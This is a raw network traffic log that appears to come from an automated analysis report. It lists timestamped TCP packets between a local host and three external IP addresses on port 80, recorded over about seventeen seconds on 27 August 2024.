Aug 27, 2024 14:21:12.750767946 CEST	52441	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:12.751131058 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:12.756422997 CEST	80	52441	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:12.756434917 CEST	80	52444	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:12.756472111 CEST	52441	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:12.756516933 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:12.756625891 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:12.761719942 CEST	80	52444	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:13.492070913 CEST	80	52444	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:13.493547916 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.495939016 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.500432014 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.502185106 CEST	80	52444	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:13.502485991 CEST	52444	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.505517960 CEST	80	52445	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:13.509512901 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.513428926 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:13.522098064 CEST	80	52445	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:13.628654957 CEST	80	52443	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:13.628746033 CEST	52443	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:13.628848076 CEST	52443	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:13.631432056 CEST	52446	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:13.633658886 CEST	80	52443	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:13.636301041 CEST	80	52446	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:13.637506008 CEST	52446	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:13.640438080 CEST	52446	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:13.645216942 CEST	80	52446	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:14.230916977 CEST	80	52445	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:14.230992079 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.434689045 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.435348988 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.442823887 CEST	80	52447	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:14.442892075 CEST	80	52445	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:14.442914009 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.443028927 CEST	52445	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.443912983 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:14.448750019 CEST	80	52447	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:15.170536995 CEST	80	52447	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:15.170717001 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.172921896 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.173214912 CEST	52448	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.177994013 CEST	80	52448	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:15.178045988 CEST	80	52447	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:15.178059101 CEST	52448	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.178088903 CEST	52447	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.178225040 CEST	52448	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.183062077 CEST	80	52448	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:15.236814022 CEST	80	52446	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:15.236875057 CEST	52446	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.236928940 CEST	52446	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.246367931 CEST	80	52446	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:15.345129967 CEST	52449	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.530441999 CEST	80	52449	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:15.533539057 CEST	52449	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.536185980 CEST	52449	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.540934086 CEST	80	52449	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:15.888864994 CEST	52449	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.889008045 CEST	52448	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:15.889029026 CEST	52442	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:15.893459082 CEST	52450	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.900058031 CEST	80	52450	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:15.900190115 CEST	52450	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.901423931 CEST	52450	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:15.907716990 CEST	80	52450	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:16.002249002 CEST	52451	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:16.002531052 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.008575916 CEST	80	52451	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:16.008596897 CEST	80	52452	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:16.008676052 CEST	52451	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:16.008677006 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.008969069 CEST	52451	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:16.009033918 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.013773918 CEST	80	52451	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:16.013883114 CEST	80	52452	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:16.799288988 CEST	80	52452	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:16.799345016 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.801414967 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.801776886 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.806986094 CEST	80	52453	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:16.807046890 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.807218075 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.807318926 CEST	80	52452	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:16.807365894 CEST	52452	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:16.812917948 CEST	80	52453	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:17.505511045 CEST	80	52450	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:17.509510994 CEST	52450	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:17.509581089 CEST	52450	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:17.514312983 CEST	80	52450	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:17.625792980 CEST	52454	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:17.630727053 CEST	80	52454	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:17.630881071 CEST	52454	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:17.630950928 CEST	52454	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:17.635535955 CEST	80	52453	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:17.635643005 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.635669947 CEST	80	52454	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:17.750494957 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.750499964 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.755331039 CEST	80	52455	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:17.755466938 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.755569935 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.755731106 CEST	80	52453	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:17.755886078 CEST	52453	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:17.762178898 CEST	80	52455	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:18.578726053 CEST	80	52455	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:18.578783035 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.582407951 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.582699060 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.587434053 CEST	80	52455	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:18.587479115 CEST	80	52457	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:18.587486982 CEST	52455	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.587532997 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.587671041 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:18.593081951 CEST	80	52457	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.219202042 CEST	80	52454	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:19.219316959 CEST	52454	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.219358921 CEST	52454	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.221802950 CEST	52458	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.224307060 CEST	80	52454	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:19.226629972 CEST	80	52458	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:19.226701975 CEST	52458	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.226840973 CEST	52458	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.231627941 CEST	80	52458	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:19.318695068 CEST	80	52457	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.318850994 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.423168898 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.423589945 CEST	52459	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.428302050 CEST	80	52457	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.428358078 CEST	52457	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.428364992 CEST	80	52459	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.428423882 CEST	52459	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.428590059 CEST	52459	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.433315039 CEST	80	52459	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.904550076 CEST	52458	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:19.904551983 CEST	52451	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:19.904699087 CEST	52459	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.907310963 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.907311916 CEST	52461	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:19.912233114 CEST	80	52460	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.912245989 CEST	80	52461	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:19.912317038 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.912373066 CEST	52461	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:19.912511110 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:19.912516117 CEST	52461	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:19.917298079 CEST	80	52460	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:19.917383909 CEST	80	52461	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:20.016849041 CEST	52462	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:20.021984100 CEST	80	52462	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:20.022110939 CEST	52462	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:20.022211075 CEST	52462	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:20.027003050 CEST	80	52462	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:20.634701967 CEST	80	52460	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:20.634771109 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.751104116 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.751470089 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.756165028 CEST	80	52460	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:20.756274939 CEST	80	52463	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:20.756287098 CEST	52460	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.756331921 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.756453037 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:20.761215925 CEST	80	52463	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:21.479444981 CEST	80	52463	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:21.480518103 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.483047009 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.483050108 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.488523960 CEST	80	52464	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:21.489198923 CEST	80	52463	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:21.489300013 CEST	52463	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.489303112 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.492449999 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:21.497291088 CEST	80	52464	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:21.611017942 CEST	80	52462	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:21.611139059 CEST	52462	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:21.611180067 CEST	52462	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:21.616044998 CEST	80	52462	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:21.616079092 CEST	52465	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:21.620913982 CEST	80	52465	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:21.621063948 CEST	52465	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:21.621310949 CEST	52465	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:21.626113892 CEST	80	52465	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:22.277605057 CEST	80	52464	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:22.278038979 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.391763926 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.392101049 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.396939993 CEST	80	52466	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:22.397037029 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.397080898 CEST	80	52464	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:22.397150040 CEST	52464	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.397351980 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:22.403059959 CEST	80	52466	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:23.220772028 CEST	80	52465	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:23.220841885 CEST	52465	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.238141060 CEST	52465	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.241611958 CEST	80	52466	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:23.241667986 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.242975950 CEST	80	52465	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:23.289577007 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.290091991 CEST	52467	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.294898033 CEST	80	52466	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:23.294945955 CEST	52466	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.295001030 CEST	80	52467	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:23.295057058 CEST	52467	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.305231094 CEST	52467	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.310126066 CEST	80	52467	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:23.402623892 CEST	52468	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.407630920 CEST	80	52468	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:23.407692909 CEST	52468	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.408741951 CEST	52468	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.413585901 CEST	80	52468	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:23.920296907 CEST	52461	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:23.920344114 CEST	52467	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:23.920423985 CEST	52468	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:23.931478977 CEST	52469	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:24.032572031 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.032573938 CEST	52470	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:24.070883989 CEST	80	52467	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.071039915 CEST	52467	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.073415995 CEST	80	52469	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:24.073427916 CEST	80	52471	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.073436022 CEST	80	52470	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:24.073556900 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.073560953 CEST	52470	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:24.073565960 CEST	52469	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:24.073719978 CEST	52469	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:24.073788881 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.075517893 CEST	52470	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:24.078496933 CEST	80	52469	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:24.078633070 CEST	80	52471	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.080409050 CEST	80	52470	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:24.816643000 CEST	80	52471	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.816709995 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.820075035 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.820420027 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.825304031 CEST	80	52472	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.825375080 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.825501919 CEST	80	52471	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:24.825525045 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.825546026 CEST	52471	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:24.830552101 CEST	80	52472	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:25.546120882 CEST	80	52472	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:25.548861027 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.656523943 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.656936884 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.667618990 CEST	80	52473	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:25.667849064 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.667890072 CEST	80	52472	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:25.667953014 CEST	52472	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.668071032 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:25.680773020 CEST	80	52473	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:25.686194897 CEST	80	52469	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:25.686310053 CEST	52469	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:25.709669113 CEST	52469	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:25.723953009 CEST	80	52469	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:25.817527056 CEST	52474	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:25.822608948 CEST	80	52474	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:25.822705984 CEST	52474	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:25.831949949 CEST	52474	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:25.836783886 CEST	80	52474	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:26.394299030 CEST	80	52473	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:26.395581961 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.398032904 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.398036003 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.402988911 CEST	80	52475	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:26.403575897 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.403737068 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.405402899 CEST	80	52473	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:26.407614946 CEST	52473	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:26.411492109 CEST	80	52475	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.104057074 CEST	80	52475	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.104226112 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.218918085 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.219192982 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.224522114 CEST	80	52476	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.224577904 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.224638939 CEST	80	52475	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.224684000 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.224687099 CEST	52475	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.230092049 CEST	80	52476	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.512782097 CEST	80	52474	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:27.515543938 CEST	52474	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.515582085 CEST	52474	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.519467115 CEST	52477	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.522068024 CEST	80	52474	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:27.525803089 CEST	80	52477	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:27.527992010 CEST	52477	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.528088093 CEST	52477	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.534338951 CEST	80	52477	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:27.900182962 CEST	80	52476	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.900724888 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.902971029 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.903283119 CEST	52478	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.908238888 CEST	80	52478	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.908253908 CEST	80	52476	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.908312082 CEST	52478	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.908338070 CEST	52476	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.908485889 CEST	52478	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.913327932 CEST	80	52478	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:27.935770035 CEST	52478	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:27.935770035 CEST	52477	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:27.936018944 CEST	52470	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:27.938316107 CEST	52479	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:27.944418907 CEST	80	52479	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:27.944667101 CEST	52479	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:27.944832087 CEST	52479	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:27.949712038 CEST	80	52479	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:28.049204111 CEST	52480	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:28.049609900 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.054050922 CEST	80	52480	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:28.054184914 CEST	52480	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:28.054316044 CEST	52480	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:28.054328918 CEST	80	52481	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:28.054464102 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.054662943 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.059161901 CEST	80	52480	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:28.059494972 CEST	80	52481	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:28.778116941 CEST	80	52481	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:28.778170109 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.781737089 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.782128096 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.790057898 CEST	80	52482	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:28.790072918 CEST	80	52481	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:28.790121078 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.790143013 CEST	52481	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.790319920 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:28.795101881 CEST	80	52482	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:29.479863882 CEST	80	52482	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:29.479928017 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:29.594501019 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:29.594505072 CEST	52483	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:29.602461100 CEST	80	52483	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:29.603193998 CEST	80	52482	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:29.603720903 CEST	52482	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:29.603720903 CEST	52483	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:29.603720903 CEST	52483	80	192.168.2.6	185.208.158.116
